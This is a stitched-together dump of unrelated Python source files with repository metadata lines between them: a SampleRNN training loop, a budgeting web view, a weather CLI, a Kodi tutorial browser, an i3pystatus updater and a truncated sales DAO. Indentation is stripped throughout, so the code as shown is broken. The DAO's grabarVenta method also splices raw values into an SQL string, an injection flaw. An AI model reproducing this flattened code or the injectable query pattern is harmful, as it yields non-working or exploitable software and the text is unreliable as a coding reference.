fixed_rand_h0 = fixed_rand_h0.astype('float32')
fixed_rand_big_h0 = numpy.random.rand(N_SEQS//2, N_RNN, H0_MULT*DIM)
fixed_rand_big_h0 -= 0.5
fixed_rand_big_h0 = fixed_rand_big_h0.astype('float32')
def generate_and_save_samples(tag):
def write_audio_file(name, data):
data = data.astype('float32')
data -= data.min()
data /= data.max()
data -= 0.5
data *= 0.95
scipy.io.wavfile.write(
os.path.join(SAMPLES_PATH, name+'.wav'),
BITRATE,
data)
total_time = time()
    # Generate N_SEQS sample files, each 5 seconds long
N_SECS = 5
LENGTH = N_SECS*BITRATE if not args.debug else 100
samples = numpy.zeros((N_SEQS, LENGTH), dtype='int32')
samples[:, :BIG_FRAME_SIZE] = Q_ZERO
# First half zero, others fixed random at each checkpoint
big_h0 = numpy.zeros(
(N_SEQS-fixed_rand_big_h0.shape[0], N_BIG_RNN, H0_MULT*BIG_DIM),
dtype='float32'
)
big_h0 = numpy.concatenate((big_h0, fixed_rand_big_h0), axis=0)
h0 = numpy.zeros(
(N_SEQS-fixed_rand_h0.shape[0], N_RNN, H0_MULT*DIM),
dtype='float32'
)
h0 = numpy.concatenate((h0, fixed_rand_h0), axis=0)
big_frame_level_outputs = None
frame_level_outputs = None
for t in xrange(BIG_FRAME_SIZE, LENGTH):
if t % BIG_FRAME_SIZE == 0:
big_frame_level_outputs, big_h0 = big_frame_level_generate_fn(
samples[:, t-BIG_FRAME_SIZE:t],
big_h0,
numpy.int32(t == BIG_FRAME_SIZE)
)
if t % FRAME_SIZE == 0:
frame_level_outputs, h0 = frame_level_generate_fn(
samples[:, t-FRAME_SIZE:t],
big_frame_level_outputs[:, (t / FRAME_SIZE) % (BIG_FRAME_SIZE / FRAME_SIZE)],
h0,
numpy.int32(t == BIG_FRAME_SIZE)
)
samples[:, t] = sample_level_generate_fn(
frame_level_outputs[:, t % FRAME_SIZE],
samples[:, t-FRAME_SIZE:t]
)
total_time = time() - total_time
log = "{} samples of {} seconds length generated in {} seconds."
log = log.format(N_SEQS, N_SECS, total_time)
print log,
for i in xrange(N_SEQS):
samp = samples[i]
if Q_TYPE == 'mu-law':
from datasets.dataset import mu2linear
samp = mu2linear(samp)
elif Q_TYPE == 'a-law':
raise NotImplementedError('a-law is not implemented')
write_audio_file("sample_{}_{}".format(tag, i), samp)
def monitor(data_feeder):
"""
Cost and time of test_fn on a given dataset section.
Pass only one of `valid_feeder` or `test_feeder`.
Don't pass `train_feed`.
:returns:
Mean cost over the input dataset (data_feeder)
Total time spent
"""
_total_time = time()
_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
_big_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
_costs = []
_data_feeder = load_data(data_feeder)
for _seqs, _reset, _mask in _data_feeder:
_cost, _big_h0, _h0 = test_fn(_seqs, _big_h0, _h0, _reset, _mask)
_costs.append(_cost)
return numpy.mean(_costs), time() - _total_time
print "Wall clock time spent before training started: {:.2f}h"\
.format((time()-exp_start)/3600.)
print "Training!"
total_iters = 0
total_time = 0.
last_print_time = 0.
last_print_iters = 0
costs = []
lowest_valid_cost = numpy.finfo(numpy.float32).max
corresponding_test_cost = numpy.finfo(numpy.float32).max
new_lowest_cost = False
end_of_batch = False
epoch = 0
h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
big_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
# Initial load train dataset
tr_feeder = load_data(train_feeder)
### Handling the resume option:
if RESUME:
# Check if checkpoint from previous run is not corrupted.
# Then overwrite some of the variables above.
iters_to_consume, res_path, epoch, total_iters,\
[lowest_valid_cost, corresponding_test_cost, test_cost] = \
lib.resumable(path=FOLDER_PREFIX,
iter_key=iter_str,
epoch_key=epoch_str,
add_resume_counter=True,
other_keys=[lowest_valid_str,
corresp_test_str,
test_nll_str])
# At this point we saved the pkl file.
last_print_iters = total_iters
print "### RESUMING JOB FROM EPOCH {}, ITER {}".format(epoch, total_iters)
    # Consume this many iterations to get back to the last point in the training data.
consume_time = time()
for i in xrange(iters_to_consume):
tr_feeder.next()
consume_time = time() - consume_time
print "Train data ready in {:.2f}secs after consuming {} minibatches.".\
format(consume_time, iters_to_consume)
lib.load_params(res_path)
print "Parameters from last available checkpoint loaded."
while True:
# THIS IS ONE ITERATION
if total_iters % 500 == 0:
print total_iters,
total_iters += 1
try:
# Take as many mini-batches as possible from train set
mini_batch = tr_feeder.next()
except StopIteration:
# Mini-batches are finished. Load it again.
# Basically, one epoch.
tr_feeder = load_data(train_feeder)
# and start taking new mini-batches again.
mini_batch = tr_feeder.next()
epoch += 1
end_of_batch = True
print "[Another epoch]",
seqs, reset, mask = mini_batch
start_time = time()
cost, big_h0, h0 = train_fn(seqs, big_h0, h0, reset, mask)
total_time += time() - start_time
#print "This cost:", cost, "This h0.mean()", h0.mean()
costs.append(cost)
# Monitoring step
if (TRAIN_MODE=='iters' and total_iters-last_print_iters == PRINT_ITERS) or \
(TRAIN_MODE=='time' and total_time-last_print_time >= PRINT_TIME) or \
(TRAIN_MODE=='time-iters' and total_time-last_print_time >= PRINT_TIME) or \
(TRAIN_MODE=='iters-time' and total_iters-last_print_iters >= PRINT_ITERS) or \
end_of_batch:
# 0. Validation
print "\nValidation!",
valid_cost, valid_time = monitor(valid_feeder)
print "Done!"
# 1. Test
test_time = 0.
# Only when the validation cost is improved get the cost for test set.
if valid_cost < lowest_valid_cost:
lowest_valid_cost = valid_cost
print "\n>>> Best validation cost of {} reached. Testing!"\
.format(valid_cost),
test_cost, test_time = monitor(test_feeder)
print "Done!"
# Report last one which is the lowest on validation set:
print ">>> test cost:{}\ttotal time:{}".format(test_cost, test_time)
corresponding_test_cost = test_cost
new_lowest_cost = True
# 2. Stdout the training progress
print_info = "epoch:{}\ttotal iters:{}\twall clock time:{:.2f}h\n"
print_info += ">>> Lowest valid cost:{}\t Corresponding test cost:{}\n"
print_info += "\ttrain cost:{:.4f}\ttotal time:{:.2f}h\tper iter:{:.3f}s\n"
print_info += "\tvalid cost:{:.4f}\ttotal time:{:.2f}h\n"
print_info += "\ttest cost:{:.4f}\ttotal time:{:.2f}h"
print_info = print_info.format(epoch,
total_iters,
(time()-exp_start)/3600,
lowest_valid_cost,
corresponding_test_cost,
numpy.mean(costs),
total_time/3600,
total_time/total_iters,
valid_cost,
valid_time/3600,
test_cost,
test_time/3600)
print print_info
tag = "e{}_i{}_t{:.2f}_tr{:.4f}_v{:.4f}"
tag = tag.format(epoch,
total_iters,
total_time/3600,
numpy.mean(cost),
valid_cost)
tag += ("_best" if new_lowest_cost else "")
# 3. Save params of model (IO bound, time consuming)
# If saving params is not successful, there shouldn't be any trace of
# successful monitoring step in train_log as well.
print "Saving params!",
lib.save_params(
os.path.join(PARAMS_PATH, 'params_{}.pkl'.format(tag))
)
print "Done!"
# 4. Save and graph training progress (fast)
training_info = {epoch_str : epoch,
iter_str : total_iters,
train_nll_str : numpy.mean(costs),
valid_nll_str : valid_cost,
test_nll_str : test_cost,
lowest_valid_str : lowest_valid_cost,
corresp_test_str : corresponding_test_cost,
'train time' : total_time,
'valid time' : valid_time,
'test time' : test_time,
'wall clock time' : time()-exp_start}
lib.save_training_info(training_info, FOLDER_PREFIX)
print "Train info saved!",
y_axis_strs = [train_nll_str, valid_nll_str, test_nll_str]
lib.plot_traing_info(iter_str, y_axis_strs, FOLDER_PREFIX)
print "And plotted!"
# 5. Generate and save samples (time consuming)
# If not successful, we still have the params to sample afterward
print "Sampling!",
# Generate samples
generate_and_save_samples(tag)
print "Done!"
if total_iters-last_print_iters == PRINT_ITERS \
or total_time-last_print_time >= PRINT_TIME:
# If we are here b/c of onom_end_of_batch, we shouldn't mess
# with costs and last_print_iters
costs = []
last_print_time += PRINT_TIME
last_print_iters += PRINT_ITERS
end_of_batch = False
new_lowest_cost = False
print "Validation Done!\nBack to Training..."
if (TRAIN_MODE=='iters' and total_iters == STOP_ITERS) or \
(TRAIN_MODE=='time' and total_time >= STOP_TIME) or \
((TRAIN_MODE=='time-iters' or TRAIN_MODE=='iters-time') and \
(total_iters == STOP_ITERS or total_time >= STOP_TIME)):
print "Done! Total iters:", total_iters, "Total time: ", total_time
print "Experiment ended at:", datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M')
print "Wall clock time spent: {:.2f}h"\
.format((time()-exp_start)/3600)
sys.exit()
license: mit | hash: -2,786,688,481,508,566,500 | line_mean: 37.406452 | line_max: 148 | alpha_frac: 0.59379 | autogenerated: false | ratio: 3.416029 | config_test: true | has_no_keywords: false | few_assignments: false
repo_name: RosesTheN00b/BudgetButlerWeb | path: butler_offline/views/einzelbuchungen/uebersicht_monat.py | copies: 1 | size: 8451 | content:
from butler_offline.viewcore.state import persisted_state
from butler_offline.core import time
from butler_offline.viewcore import request_handler
from butler_offline.viewcore import viewcore
from butler_offline.core.report import ReportGenerator
from butler_offline.viewcore.converter import datum_to_string
def _handle_request(request):
context = viewcore.generate_base_context('monatsuebersicht')
einzelbuchungen = persisted_state.database_instance().einzelbuchungen
monate = sorted(einzelbuchungen.get_monate(), reverse=True)
context['monate'] = monate
if not monate:
return viewcore.generate_error_context('monatsuebersicht', 'Keine Ausgaben erfasst')
selected_item = context['monate'][0]
if request.method == "POST":
selected_item = request.values['date']
month = int(float(selected_item.split("_")[1]))
year = int(float(selected_item.split("_")[0]))
table_data_selection = einzelbuchungen.select().select_month(month).select_year(year)
table_ausgaben = table_data_selection.select_ausgaben()
table_einnahmen = table_data_selection.select_einnahmen()
    '''
    Computation of the expenses for the pie chart
    '''
ausgaben_liste = []
ausgaben_labels = []
ausgaben_data = []
ausgaben_colors = []
for kategorie, row in table_ausgaben.group_by_kategorie().iterrows():
ausgaben_labels.append(kategorie)
ausgaben_data.append("%.2f" % abs(row.Wert))
ausgaben_colors.append("#" + einzelbuchungen.get_farbe_fuer(kategorie))
ausgaben_liste.append((kategorie, "%.2f" % row.Wert, einzelbuchungen.get_farbe_fuer(kategorie)))
context['ausgaben'] = ausgaben_liste
context['ausgaben_labels'] = ausgaben_labels
context['ausgaben_data'] = ausgaben_data
context['ausgaben_colors'] = ausgaben_colors
    '''
    Computation of the income for the pie chart
    '''
einnahmen_liste = []
einnahmen_labels = []
einnahmen_data = []
einnahmen_colors = []
for kategorie, row in table_einnahmen.group_by_kategorie().iterrows():
einnahmen_labels.append(kategorie)
einnahmen_data.append("%.2f" % abs(row.Wert))
einnahmen_colors.append("#" + einzelbuchungen.get_farbe_fuer(kategorie))
einnahmen_liste.append((kategorie, "%.2f" % row.Wert, einzelbuchungen.get_farbe_fuer(kategorie)))
context['einnahmen'] = einnahmen_liste
context['einnahmen_labels'] = einnahmen_labels
context['einnahmen_data'] = einnahmen_data
context['einnahmen_colors'] = einnahmen_colors
zusammenfassung = table_data_selection.get_month_summary()
for tag, kategorien_liste in zusammenfassung:
for einheit in kategorien_liste:
einheit['farbe'] = einzelbuchungen.get_farbe_fuer(einheit['kategorie'])
context['zusammenfassung'] = zusammenfassung
ausgaben_monat = table_ausgaben.sum()
context['gesamt'] = "%.2f" % ausgaben_monat
einnahmen_monat = table_einnahmen.sum()
context['gesamt_einnahmen'] = "%.2f" % einnahmen_monat
selected_date = str(year) + "_" + str(month).rjust(2, "0")
context['selected_date'] = selected_date
context['selected_year'] = year
if einnahmen_monat >= abs(ausgaben_monat):
context['color_uebersicht_gruppe_1'] = "gray"
context['name_uebersicht_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_gruppe_1'] = '%.2f' % abs(ausgaben_monat)
context['color_uebersicht_gruppe_2'] = "lightgreen"
context['name_uebersicht_gruppe_2'] = 'Einnahmenüberschuss'
context['wert_uebersicht_gruppe_2'] = '%.2f' % (einnahmen_monat + ausgaben_monat)
else:
context['color_uebersicht_gruppe_1'] = "gray"
context['name_uebersicht_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_gruppe_1'] = '%.2f' % einnahmen_monat
context['color_uebersicht_gruppe_2'] = "red"
context['name_uebersicht_gruppe_2'] = 'Ungedeckte Ausgaben'
context['wert_uebersicht_gruppe_2'] = '%.2f' % ((ausgaben_monat + einnahmen_monat) * -1)
einnahmen_jahr = einzelbuchungen.select().select_einnahmen().select_year(year).sum()
ausgaben_jahr = einzelbuchungen.select().select_ausgaben().select_year(year).sum()
if einnahmen_jahr >= abs(ausgaben_jahr):
context['color_uebersicht_jahr_gruppe_1'] = "gray"
context['name_uebersicht_jahr_gruppe_1'] = 'Gedeckte Einnahmen'
context['wert_uebersicht_jahr_gruppe_1'] = '%.2f' % abs(ausgaben_jahr)
context['color_uebersicht_jahr_gruppe_2'] = "lightgreen"
context['name_uebersicht_jahr_gruppe_2'] = 'Einnahmenüberschuss'
context['wert_uebersicht_jahr_gruppe_2'] = '%.2f' % (einnahmen_jahr + ausgaben_jahr)
else:
context['color_uebersicht_jahr_gruppe_1'] = "gray"
context['name_uebersicht_jahr_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_1'] = '%.2f' % einnahmen_jahr
context['color_uebersicht_jahr_gruppe_2'] = "red"
context['name_uebersicht_jahr_gruppe_2'] = 'Ungedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_2'] = '%.2f' % ((ausgaben_jahr + einnahmen_jahr) * -1)
return context
def index(request):
return request_handler.handle_request(request, _handle_request, 'einzelbuchungen/uebersicht_monat.html')
def _abrechnen(request):
context = viewcore.generate_base_context('monatsuebersicht')
date = time.today()
year = date.year
month = date.month
quantity = 60
if request.method == 'POST':
if 'date' in request.values:
str_year, str_month = request.values['date'].split('_')
year = int(str_year)
month = int(str_month)
if 'quantity' in request.values:
quantity = int(request.values['quantity'])
einzelbuchungen = persisted_state.database_instance().einzelbuchungen
generator = ReportGenerator('Monatsübersicht für ' + str(month) + '/' + str(year), quantity)
table_data_selection = einzelbuchungen.select().select_month(month).select_year(year)
table_ausgaben = table_data_selection.select_ausgaben()
table_einnahmen = table_data_selection.select_einnahmen()
if _is_selected(request, 'zusammenfassung_einnahmen'):
data = {}
for kategorie, row in table_einnahmen.group_by_kategorie().iterrows():
data[kategorie] = row.Wert
generator.add_half_line_elements({'Einnahmen': data})
if _is_selected(request, 'zusammenfassung_ausgaben'):
data = {}
for kategorie, row in table_ausgaben.group_by_kategorie().iterrows():
data[kategorie] = row.Wert
generator.add_half_line_elements({'Ausgaben': data})
if _is_selected(request, 'einnahmen'):
generator.add_halfline('')
generator.add_halfline('')
generator.add_halfline('----Einnahmen----')
zusammenfassung = table_einnahmen.zusammenfassung()
compiled_zusammenfassung = {}
for tag, kategorien_liste in zusammenfassung:
compiled_zusammenfassung[datum_to_string(tag)] = {}
for einheit in kategorien_liste:
compiled_zusammenfassung[datum_to_string(tag)][einheit['name']] = float(einheit['summe'])
generator.add_half_line_elements(compiled_zusammenfassung)
if _is_selected(request, 'ausgaben'):
generator.add_halfline('')
generator.add_halfline('')
generator.add_halfline('----Ausgaben----')
zusammenfassung = table_ausgaben.zusammenfassung()
compiled_zusammenfassung = {}
for tag, kategorien_liste in zusammenfassung:
compiled_zusammenfassung[datum_to_string(tag)] = {}
for einheit in kategorien_liste:
compiled_zusammenfassung[datum_to_string(tag)][einheit['name']] = float(einheit['summe'])
generator.add_half_line_elements(compiled_zusammenfassung)
page = ''
for line in generator.generate_pages():
page = page + '<br>' + line
context['abrechnungstext'] = '<pre>' + page + '</pre>'
context['element_titel'] = 'Abrechnung vom {month}/{year}'.format(month=month, year=year)
return context
def _is_selected(request, name):
if request.method != 'POST':
return True
if name in request.values:
return True
return False
def abrechnen(request):
return request_handler.handle_request(request, _abrechnen, 'shared/present_abrechnung.html')
license: agpl-3.0 | hash: -3,474,251,232,784,731,600 | line_mean: 41.437186 | line_max: 108 | alpha_frac: 0.665483 | autogenerated: false | ratio: 2.730359 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: schmodd/forecast.py | path: forecast.py | copies: 1 | size: 4251 | content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# todo: add alerts, colors
import requests
import json
import datetime
import argparse
import sys
from prettytable import PrettyTable
# surf to https://developer.forecast.io/ for an api key
# use http://dbsgeo.com/latlon/ to get coordinates for your location
API_KEY=''
LAT=''
LONG=''
LIMIT=24 # limit hourly forecast output (48 max)
#some api settings
UNITS='si' # auto possibly shows wrong measuring unit
LANG='en'
def formatDatetime(unixTime, outputFormat='%d. %b. %H:%M'):
return datetime.datetime.fromtimestamp(unixTime).strftime(outputFormat)
def getMeasuringUnit():
return '\N{DEGREE SIGN}F' if UNITS == 'us' else '\N{DEGREE SIGN}C'
def getPrecip(probability, type):
probability = '{:3.0f} {:1}'.format(probability * 100, '%')
return '{:} {:>5}'.format(probability, '-') if type == 0 else '{:} {:>5}'.format(probability, type)
def showDaily(measuring_unit):
HEAD = ['Date', 'Temp min', 'Temp max', 'HUM', 'SR', 'SS', 'Precip', 'Summary']
table = PrettyTable(HEAD, border = False, padding_width = 2)
table.align='r'
table.align['Date'] = 'l'
table.align['Summary'] = 'l'
for day in result['daily']['data']:
table.add_row([formatDatetime(day['time'], '%d. %b.'), '{:4.2f} {:2}'.format(day['temperatureMin'],
measuring_unit), '{:4.2f} {:2}'.format(day['temperatureMax'], measuring_unit),
'{:3.0f} {:1}'.format(day['humidity'] * 100, '%'), formatDatetime(day['sunriseTime'], '%H:%M'),
formatDatetime(day['sunsetTime'], '%H:%M'), getPrecip(day['precipProbability'],
day['precipType'] if day['precipProbability'] > 0 else 0), day['summary']])
print('\n', end='')
print(table)
def showHourly(measuring_unit):
HEAD = ['Date', 'Temp', 'HUM', 'Precip', 'Summary']
table = PrettyTable(HEAD, border = False, padding_width = 2)
table.align='r'
table.align['Date'] = 'l'
table.align['Summary'] = 'l'
for hour in result['hourly']['data'][0:LIMIT]:
table.add_row([formatDatetime(hour['time'], '%d. %b. %H:%M'), '{:4.2f} {:2}'.format(hour['temperature'],
measuring_unit), '{:3.0f} {:1}'.format(hour['humidity'] * 100, '%'), getPrecip(hour['precipProbability'],
hour['precipType'] if hour['precipProbability'] > 0 else 0), hour['summary']])
print('\n', end='')
print(table)
if __name__ == '__main__':
if not API_KEY or not LAT or not LONG:
sys.exit("aborted! please make sure api-key and coordinates are specified")
parser = argparse.ArgumentParser(description='weather forecast powered by forecast.io')
group = parser.add_mutually_exclusive_group()
group.add_argument('-df', help='daily forecast', action='store_true')
group.add_argument('-hf', help='hourly forecast', action='store_true')
args = parser.parse_args()
BASE_URL = 'https://api.forecast.io/forecast/'
SETTINGS = API_KEY + '/' + LAT + ',' + LONG + '?units=' + UNITS + '&lang='+ LANG + '&exclude=flags,minutely,'
URL = BASE_URL + SETTINGS
HTTP_HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0',
'Accept-Encoding': 'gzip'}
MEAS_UNIT = getMeasuringUnit()
if args.df:
URL += 'hourly,currently'
elif args.hf:
URL += 'daily,currently'
else:
URL += 'hourly,daily'
result = requests.get(URL, headers=HTTP_HEADERS)
if result.status_code == 200:
result = result.json()
if args.df:
showDaily(MEAS_UNIT)
elif args.hf:
showHourly(MEAS_UNIT)
else:
print('{:} {:10}'.format('\n date:', formatDatetime(result['currently']['time'])), end='')
print('{:} {:6.2f} {:2}'.format(' | temp:', result['currently']['temperature'], MEAS_UNIT), end='')
print('{:} {:2.0f} {:1}'.format(' | humidity:', result['currently']['humidity'] * 100, '%'), end='')
print('{:} {:}'.format(' | precipitation:', getPrecip(result['currently']['precipProbability'],
result['currently']['precipType'] if result['currently']['precipProbability'] > 0 else 0)))
else:
print('aborted! problems connecting to forecast.io')
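# --- Added illustration (not part of the original script) ---
# Example invocations once API_KEY, LAT and LONG are filled in above:
#   python forecast.py        # current conditions only
#   python forecast.py -df    # daily forecast table
#   python forecast.py -hf    # hourly forecast table (capped by LIMIT)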
license: mit | hash: -898,684,992,294,098,300 | line_mean: 40.676471 | line_max: 117 | alpha_frac: 0.605034 | autogenerated: false | ratio: 3.352524 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: repotvsupertuga/tvsupertuga.repository | path: script.module.python.koding.aio/lib/koding/tutorials.py | copies: 1 | size: 7420 | content:
# -*- coding: utf-8 -*-
# script.module.python.koding.aio
# Python Koding AIO (c) by TOTALREVOLUTION LTD (support@trmc.freshdesk.com)
# Python Koding AIO is licensed under a
# Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.
# You should have received a copy of the license along with this
# work. If not, see http://creativecommons.org/licenses/by-nc-nd/4.0.
# Please make sure you've read and understood the license, this code can NOT be used commercially
# and it can NOT be modified and redistributed. If you're found to be in breach of this license
# then any affected add-ons will be blacklisted and will not be able to work on the same system
# as any other add-ons which use this code. Thank you for your cooperation.
import os
import re
import sys
import urllib
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
import xbmcvfs
from directory import Add_Dir
from filetools import Text_File
from vartools import Find_In_Text
from guitools import Text_Box, Show_Busy, Keyboard
from systemtools import Sleep_If_Window_Active
from video import Play_Video
from web import Open_URL
dialog = xbmcgui.Dialog()
py_path = 'special://home/addons/script.module.python.koding.aio/lib/koding'
video_base = 'http://totalrevolution.tv/videos/python_koding/'
#----------------------------------------------------------------
def Grab_Tutorials():
""" internal command ~"""
import re
full_array = []
dirs,files = xbmcvfs.listdir(py_path)
# Check all the modules for functions with tutorial info
for file in files:
file_path = os.path.join(py_path,file)
if file.endswith('.py') and file != 'tutorials.py':
content = Text_File(file_path,'r').replace('\r','')
# content_array = re.compile('# TUTORIAL #\ndef (.+?)\(').findall(content)
content_array = Find_In_Text(content=content, start='# TUTORIAL #\ndef ', end='\(', show_errors=False)
if content_array:
for item in content_array:
item = item.strip()
full_array.append('%s~%s'%(item,file_path))
content_array = Find_In_Text(content=content, start='# TUTORIAL #\nclass ', end='\(', show_errors=False)
if content_array:
for item in content_array:
item = item.strip()
full_array.append('%s~%s'%(item,file_path))
# Return a list of tutorials
Add_Dir('[COLOR=gold]CREATE YOUR FIRST ADD-ON[/COLOR]',video_base+'Create_Addon.mov','play_video', folder=False, icon='', fanart='', description='How to create your own add-on using the Python Koding framework.')
for item in sorted(full_array,key=str.lower):
name, filepath = item.split('~')
filepath = urllib.quote(filepath)
Add_Dir(name=name.upper().replace('_',' '), url='%s~%s'%(name,filepath), mode='show_tutorial', folder=False, icon='', fanart='', description='Instructions for how to use the %s function.'%name)
#----------------------------------------------------------------
def Show_Tutorial(url):
""" internal command ~"""
name, filepath = url.split('~')
filepath = urllib.unquote(filepath)
readfile = Text_File(filepath,'r').replace('\r','')
try:
raw_find = Find_In_Text(content=readfile, start='# TUTORIAL #\ndef %s' % name,end='~"""')[0]
except:
raw_find = Find_In_Text(content=readfile, start='# TUTORIAL #\nclass %s' % name,end='~"""')[0]
# Check if an example code segment exists in the comments
if 'EXAMPLE CODE:' in raw_find:
code = re.findall(r'(?<=EXAMPLE CODE:)(?s)(.*$)', raw_find)[0]
code = code.replace('script.module.python.koding.aio','temp_replace_string')
code = code.replace('koding.','').strip()
code = code.replace('temp_replace_string','script.module.python.koding.aio')
else:
code = None
# Check if a video exists in the comments
internetstate = xbmc.getInfoLabel('System.InternetState')
if internetstate:
video_page = Open_URL(video_base)
extension = Find_In_Text(video_page, name, '"', False)
if extension != '' and extension != None:
video = video_base+name+extension[0]
else:
video = None
else:
video = None
counter = 0
removal_string = ''
final_header = ''
newline = ''
temp_raw = raw_find.splitlines()
for line in temp_raw:
if counter == 0:
removal_string += line
if '[' in line:
replace_file = Find_In_Text(content=line,start='\[',end='\]')
for item in replace_file:
line = line.replace(item,'')
if ',' in line:
header_extension = line.split(',')
for item in header_extension:
if '=' in item:
item = item.split('=')[0]
final_header += item+','
final_header = 'koding.'+name+final_header[:-2]+')'
else:
final_header = 'koding.'+name+line[:-1]
else:
removal_string += '\n'+line
counter += 1
if counter == 2:
break
if final_header.endswith('))'):
final_header = final_header[:-1]
if final_header.startswith('koding.User_Info'):
final_header = 'koding.User_Info()'
full_text = raw_find.replace(removal_string,'').strip()
# Initialise the dialog select
dialog_array = ['Documentation']
if code:
dialog_array.append('Run Example Code')
if video:
dialog_array.append('Watch Video')
# If there's more than one item we show a dialog select otherwise we just load up the text window
if len(dialog_array) > 1:
choice = dialog.select(name, dialog_array)
if choice >= 0:
choice = dialog_array[choice]
if choice == 'Documentation':
Text_Box(final_header,full_text
.replace('AVAILABLE PARAMS:','[COLOR=dodgerblue]AVAILABLE PARAMS:[/COLOR]')
.replace('EXAMPLE CODE:','[COLOR=dodgerblue]EXAMPLE CODE:[/COLOR]')
.replace('IMPORTANT:','[COLOR=gold]IMPORTANT:[/COLOR]')
.replace('CODE:','[COLOR=dodgerblue]CODE:[/COLOR]')
.replace('AVAILABLE VALUES:','[COLOR=dodgerblue]AVAILABLE VALUES:[/COLOR]')
.replace('WARNING:','[COLOR=red]WARNING:[/COLOR]'))
elif choice == 'Run Example Code':
codefile = filepath.split(os.sep)
codefile = codefile[len(codefile)-1].replace('.py','')
exec('from %s import *' % codefile)
# exec('from %s import %s' % (codefile, params["name"]))
exec(code)
elif choice == 'Watch Video':
Play_Video(video)
if choice < 0:
return
else:
Text_Box(final_header,full_text
.replace('AVAILABLE PARAMS:','[COLOR=dodgerblue]AVAILABLE PARAMS:[/COLOR]')
.replace('EXAMPLE CODE:','[COLOR=dodgerblue]EXAMPLE CODE:[/COLOR]')
.replace('IMPORTANT:','[COLOR=gold]IMPORTANT:[/COLOR]')
.replace('CODE:','[COLOR=dodgerblue]CODE:[/COLOR]')
.replace('AVAILABLE VALUES:','[COLOR=dodgerblue]AVAILABLE VALUES:[/COLOR]')
.replace('WARNING:','[COLOR=red]WARNING:[/COLOR]'))
license: gpl-2.0 | hash: -4,688,523,344,214,192,000 | line_mean: 42.893491 | line_max: 216 | alpha_frac: 0.588434 | autogenerated: false | ratio: 3.776986 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: juliushaertl/i3pystatus | path: i3pystatus/updates/__init__.py | copies: 1 | size: 3829 | content:
import threading
from i3pystatus import SettingsBase, Module, formatp
from i3pystatus.core.util import internet, require
class Backend(SettingsBase):
settings = ()
updates = 0
class Updates(Module):
"""
Generic update checker.
To use select appropriate backend(s) for your system.
For list of all available backends see :ref:`updatebackends`.
Left clicking on the module will refresh the count of upgradeable packages.
This may be used to dismiss the notification after updating your system.
.. rubric:: Available formatters
* `{count}` — Sum of all available updates from all backends.
* For each backend registered there is one formatter named after the backend,
multiple identical backends do not accumulate, but overwrite each other.
    * For example, `{Cower}` (note capital C) is the number of updates reported by
the cower backend, assuming it has been registered.
.. rubric:: Usage example
::
from i3pystatus import Status
from i3pystatus.updates import pacman, cower
status = Status(standalone=True)
status.register("updates",
format = "Updates: {count}",
format_no_updates = "No updates",
backends = [pacman.Pacman(), cower.Cower()])
status.run()
"""
interval = 3600
settings = (
("backends", "Required list of backends used to check for updates."),
("format", "Format used when updates are available. "
"May contain formatters."),
("format_no_updates", "String that is shown if no updates are available."
" If not set the module will be hidden if no updates are available."),
("format_working", "Format used while update queries are run. By default the same as ``format``."),
"color",
"color_no_updates",
"color_working",
("interval", "Default interval is set to one hour."),
)
required = ("backends",)
backends = None
format = "Updates: {count}"
format_no_updates = None
format_working = None
color = "#00DD00"
color_no_updates = "#FFFFFF"
color_working = None
on_leftclick = "run"
def init(self):
if not isinstance(self.backends, list):
self.backends = [self.backends]
if self.format_working is None: # we want to allow an empty format
self.format_working = self.format
self.color_working = self.color_working or self.color
self.data = {
"count": 0
}
self.condition = threading.Condition()
self.thread = threading.Thread(target=self.update_thread, daemon=True)
self.thread.start()
def update_thread(self):
self.check_updates()
while True:
with self.condition:
self.condition.wait(self.interval)
self.check_updates()
@require(internet)
def check_updates(self):
self.output = {
"full_text": formatp(self.format_working, **self.data).strip(),
"color": self.color_working,
}
updates_count = 0
for backend in self.backends:
updates = backend.updates
updates_count += updates
self.data[backend.__class__.__name__] = updates
if updates_count == 0:
self.output = {} if not self.format_no_updates else {
"full_text": self.format_no_updates,
"color": self.color_no_updates,
}
return
self.data["count"] = updates_count
self.output = {
"full_text": formatp(self.format, **self.data).strip(),
"color": self.color,
}
def run(self):
with self.condition:
self.condition.notify()
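# --- Added illustration (not part of the original module) ---
# Minimal sketch of a custom backend, mirroring how the bundled backends expose
# an `updates` value that check_updates() reads; the class name and the fixed
# count are hypothetical.
#   class StaticBackend(Backend):
#       @property
#       def updates(self):
#           return 3
#   status.register("updates", backends=[StaticBackend()])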
license: mit | hash: 3,242,534,360,093,105,000 | line_mean: 30.628099 | line_max: 107 | alpha_frac: 0.597857 | autogenerated: false | ratio: 4.348864 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: git-pedro-77/PROYECTOFINALPYTHON | path: proyectoITSAE/ec/edu/itsae/dao/ventaDao.py | copies: 1 | size: 2654 | content:
# coding:utf-8
'''
Created on 27/1/2015
@author: Programacion
'''
from ec.edu.itsae.conn import DBcon
#from flask import redirect, url_for
import json
class VentaDao(DBcon.DBcon):  # inheriting from DBcon
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
        pass  # used when the method has no implementation
def reportarventa(self):
        con=self.conexion().connect().cursor()  # obtained from the DBcon class
con.execute(" select * from venta ")
reporte=con.fetchall()
        return reporte  # nothing should go after the return
def grabarVenta(self, vendedor, turno, fechaventa,gestion ):
con=self.conexion().connect()
sql= """insert into venta(vendedor, turno, fechaventa, gestion)
values ('%s','%s', '%s','%s')
""" %(vendedor, turno, fechaventa,gestion )
        #print sql  # to print the query so we can inspect it
with con:
